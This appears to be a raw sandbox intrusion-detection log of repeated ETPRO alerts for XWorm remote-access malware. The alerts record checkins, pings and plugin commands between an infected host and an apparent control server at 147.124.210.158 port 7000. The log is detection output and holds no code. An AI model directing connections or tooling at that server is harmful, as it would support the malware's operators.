                                                                                                    2025-01-07T17:05:00.160249+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:01.851972+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:05:01.853889+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:06.022447+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:05:06.024070+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:08.163715+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:05:08.166136+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:16.085092+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:05:16.087337+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:16.139798+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:05:16.142060+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:16.182714+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:05:16.184507+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:16.237464+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:05:16.239345+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:18.288326+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:05:18.289912+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:22.774767+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:05:22.774767+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:05:23.539446+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:05:23.544544+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:26.355839+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:05:26.357701+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:26.453120+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:05:26.454794+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:31.415673+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:05:31.419268+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:31.633644+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:05:31.634964+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:31.730512+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:05:31.732017+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:33.724823+01002853192ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:34.826649+01002853191ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:05:35.188552+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:35.188552+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:35.294930+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:35.294930+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:35.404563+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:35.404563+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:35.514930+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:35.514930+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:35.622372+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:35.622372+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:35.731845+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:35.731845+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:35.841904+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:35.841904+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:35.950635+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:35.950635+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:36.059877+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:36.059877+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:36.191442+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:36.191442+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:36.315928+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:36.315928+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:36.419357+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:36.419357+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:36.528749+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:36.528749+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:36.640590+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:36.640590+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:36.748199+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:36.748199+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:36.860621+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:36.860621+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:36.966489+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:36.966489+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:37.075581+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:37.075581+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:37.244825+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:37.244825+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:37.294350+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:37.294350+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:37.403621+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:37.403621+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:37.540835+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:37.540835+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:37.622368+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:37.622368+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:37.759076+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:37.759076+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:37.841236+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:37.841236+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:37.950683+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:37.950683+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:38.059975+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:38.059975+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:38.169292+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:38.169292+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:38.307024+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:38.307024+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:38.388199+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:38.388199+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:38.527090+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:38.527090+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:38.608606+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:38.608606+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:38.718754+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:38.718754+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:38.826729+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:38.826729+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:38.947101+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:38.947101+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:39.046741+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:39.046741+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:39.154692+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:39.154692+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:39.263494+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:39.263494+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:39.372318+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:39.372318+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:39.482331+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:39.482331+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:39.593101+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:39.593101+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:39.700751+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:39.700751+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:39.809805+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:39.809805+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:39.919449+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:39.919449+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:40.028581+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:40.028581+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:40.151019+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:40.151019+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:40.247349+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:40.247349+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:40.356855+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:40.356855+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:40.466075+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:40.466075+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:40.576024+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:40.576024+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:40.684798+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:40.684798+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:40.796567+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:40.796567+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:40.903602+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:40.903602+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:41.024680+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:41.024680+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:41.123061+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:41.123061+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:41.231950+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:41.231950+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:41.352682+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:41.352682+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:41.466153+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:41.466153+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:41.576576+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:41.576576+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:41.685190+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:41.685190+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:41.779688+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:05:41.781516+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:41.794258+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:41.794258+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:42.122565+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:42.122565+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:42.231848+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:42.231848+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:42.341234+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:42.341234+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:42.450570+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:42.450570+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:42.559826+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:42.559826+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:42.672578+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:42.672578+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:42.778647+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:42.778647+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:42.890925+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:42.890925+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:42.999755+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:42.999755+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.450010147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:43.106771+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.450010147.124.210.1587000TCP
